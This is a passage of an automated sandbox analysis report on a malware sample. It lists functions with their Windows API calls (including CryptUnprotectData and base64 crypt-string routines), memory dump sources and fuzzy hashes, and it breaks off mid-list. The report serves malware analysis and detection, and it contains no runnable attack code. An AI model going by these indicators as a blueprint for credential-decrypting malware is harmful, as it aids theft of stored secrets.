                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                • API String ID: 189259977-0
                                • Opcode ID: 1b5a1952998444daf361e6c095131c0effb57e389dc4f86e692d74a089bb8df3
                                • Instruction ID: 3ff2e22ccd7fc86f3f26c925ea96fa0c8643c89c5a80ace52150727527fb3830
                                • Opcode Fuzzy Hash: 1b5a1952998444daf361e6c095131c0effb57e389dc4f86e692d74a089bb8df3
                                • Instruction Fuzzy Hash: 4E31E976A00119ABDB109B99EC49FEFB77DDF49705F0481B5FA09E3140DBB06A18CBA1
                                Function 00C940B0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 00C940CD
                                • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 00C940DC
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C940E3
                                • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00C94113
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptHeapString$AllocateProcess
                                • String ID:
                                • API String ID: 3825993179-0
                                • Opcode ID: 3b56f2cbaad55e6e370d3028ec41818549d897407adbbd2b90e829619d138b0b
                                • Instruction ID: 77589f4197689854c5c828f0608951b3320148736dbf0793160cb1acebe55454
                                • Opcode Fuzzy Hash: 3b56f2cbaad55e6e370d3028ec41818549d897407adbbd2b90e829619d138b0b
                                • Instruction Fuzzy Hash: EC011A70600205AFDB149FA6DC89FABBBADEF89311F108159BE0997240DA71AD45CBA4
                                Function 00C92B60 Relevance: 6.0, APIs: 4, Instructions: 48memorytimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,00C9A3D0,000000FF), ref: 00C92B8F
                                • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00C92B96
                                • GetLocalTime.KERNEL32(?,?,00000000,00C9A3D0,000000FF), ref: 00C92BA2
                                • wsprintfA.USER32 ref: 00C92BCE
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                • Opcode ID: 223dab3572d1c4fb5999c75648ee01929040dde02b30ccf55ac6fa4091e2f633
                                • Instruction ID: 489c80bb6413b7104a7469501ff11739336d487201016cfeb0676760c12194d9
                                • Opcode Fuzzy Hash: 223dab3572d1c4fb5999c75648ee01929040dde02b30ccf55ac6fa4091e2f633
                                • Instruction Fuzzy Hash: AA0140B2904128AFCB149BCADD45BBFB7BCFB4DB51F00411AF605A2290E7785444C7B1
                                Function 00C79B20 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00C79B3B
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00C79B4A
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00C79B61
                                • LocalFree.KERNEL32 ref: 00C79B70
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID:
                                • API String ID: 4291131564-0
                                • Opcode ID: a194c295b3da56c50bd9c875d78074a35493e6aaf1cb0a4e8e1aca4d14d30475
                                • Instruction ID: 0d56613d7ce20c9df3f25dc7f4036663675541397da4ca21a737fc8c88307e40
                                • Opcode Fuzzy Hash: a194c295b3da56c50bd9c875d78074a35493e6aaf1cb0a4e8e1aca4d14d30475
                                • Instruction Fuzzy Hash: F6F01D703403126FE7301F65AC49F577BA8EF09B90F200115FA49EA2D0D7B0A844CAA4
                                Function 00C8CAE0 Relevance: 4.6, APIs: 3, Instructions: 89comstringCOMMON
                                Download Yara Rule
                                APIs
                                • CoCreateInstance.COMBASE(00C9B110,00000000,00000001,00C9B100,?), ref: 00C8CB06
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 00C8CB46
                                • lstrcpyn.KERNEL32(?,?,00000104), ref: 00C8CBC9
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                                • String ID:
                                • API String ID: 1940255200-0
                                • Opcode ID: 923fa0a9f3f45d2e14d0a59b31e25f331cea6ac0100edebe26730a59e49aba8d
                                • Instruction ID: 5a1291ddb20aad9ad528ac7420e90382dce75892b1888a794086f5b8a149ea53
                                • Opcode Fuzzy Hash: 923fa0a9f3f45d2e14d0a59b31e25f331cea6ac0100edebe26730a59e49aba8d
                                • Instruction Fuzzy Hash: EF315571A40619BFD710DB94CC96FAAB7B9DB88B14F1041D4FA14EB2D0D7B0AE45CBA0
                                Function 00C79B80 Relevance: 4.5, APIs: 3, Instructions: 44memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00C79B9F
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00C79BB3
                                • LocalFree.KERNEL32(?), ref: 00C79BD7
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                • Opcode ID: 7b4a3241b86f8d9a23b97dd91620fe246326791e3b8efb5faa48aab292ab350a
                                • Instruction ID: 6801dea46e209c87cbf0ee205512a5a1d04ecd3462deb9719559ffd1af847247
                                • Opcode Fuzzy Hash: 7b4a3241b86f8d9a23b97dd91620fe246326791e3b8efb5faa48aab292ab350a
                                • Instruction Fuzzy Hash: 06011275A413096FD7109BA4DC46FAFB778EB48700F108554EA04AB281D7B0AE04C7D0
                                Function 01020191 Relevance: 4.0, Strings: 2, Instructions: 1549COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: @(]w$W(]
                                • API String ID: 0-464159093
                                • Opcode ID: 0d41f8668ff8f901f22a3402aa1e18ba669d05ea1e207276a270af0aaf60ad7b
                                • Instruction ID: d81d8680d4a192d32706d276b6dee51b1550438224e26af1e06b3fc4bab08d9a
                                • Opcode Fuzzy Hash: 0d41f8668ff8f901f22a3402aa1e18ba669d05ea1e207276a270af0aaf60ad7b
                                • Instruction Fuzzy Hash: 90A2F3F36082049FE304AE2DEC8567ABBE5EF94320F1A493DEAC4C7344E63598558797
                                Function 00FC0395 Relevance: 1.5, Strings: 1, Instructions: 226COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: X"x{
                                • API String ID: 0-872755605
                                • Opcode ID: 389f24027c4d350c6bbad7dcd94a274db800ef8addc4a96906ad118e788c2845
                                • Instruction ID: d4e39ff8ea3a3e8e6fa78e9bfea9f7a199c707834ee5231bbd47c2363bc70153
                                • Opcode Fuzzy Hash: 389f24027c4d350c6bbad7dcd94a274db800ef8addc4a96906ad118e788c2845
                                • Instruction Fuzzy Hash: EF6137F3A183085BE3146E7CDC5576BBBD8EB50320F1A473DEA94D3380E92A99048296
                                Function 00FC5926 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: D>{
                                • API String ID: 0-3988291388
                                • Opcode ID: 4194aaf9a9b94db58d2fdb1f2c6cb49f959d8cd3558e672492dd7a1f83ded129
                                • Instruction ID: 2c9fbb742e37896002ce817751b183381f83039229ea25323300d5e6d74e476f
                                • Opcode Fuzzy Hash: 4194aaf9a9b94db58d2fdb1f2c6cb49f959d8cd3558e672492dd7a1f83ded129
                                • Instruction Fuzzy Hash: C94125B36086049FE740AE2DDC4A76BBBD5EFC8360F6A853DE2C8C7740E93498458656
                                Function 0107EE5C Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: @sm
                                • API String ID: 0-2878930846
                                • Opcode ID: 9a0b4a828e385f58af98db913e964d7e48dafc06539e899d905edd1da4690a57
                                • Instruction ID: e6238b613d9554b542d1937ddba2ebcaf26c102976615770e7f1e9023af9dd4d
                                • Opcode Fuzzy Hash: 9a0b4a828e385f58af98db913e964d7e48dafc06539e899d905edd1da4690a57
                                • Instruction Fuzzy Hash: F53139B25097149FD351BF29D8856AEFBF9FF98720F06481DE6C483214E6356880CB97
                                Function 00EE7EED Relevance: .2, Instructions: 157COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d5a71178b5951894e3f5aff088feffd49474d0b3ca4e01a70ca535cdc3b12d5f
                                • Instruction ID: 4b823a5e50527ffaa1be693386ca5bce282130cd1cef69129b7c774b25afde51
                                • Opcode Fuzzy Hash: d5a71178b5951894e3f5aff088feffd49474d0b3ca4e01a70ca535cdc3b12d5f
                                • Instruction Fuzzy Hash: 4941EAF3E086005FF3006E2EDD4577AB797EFD4320F1A853DEA8857744E97498068692
                                Function 00F26212 Relevance: .2, Instructions: 156COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
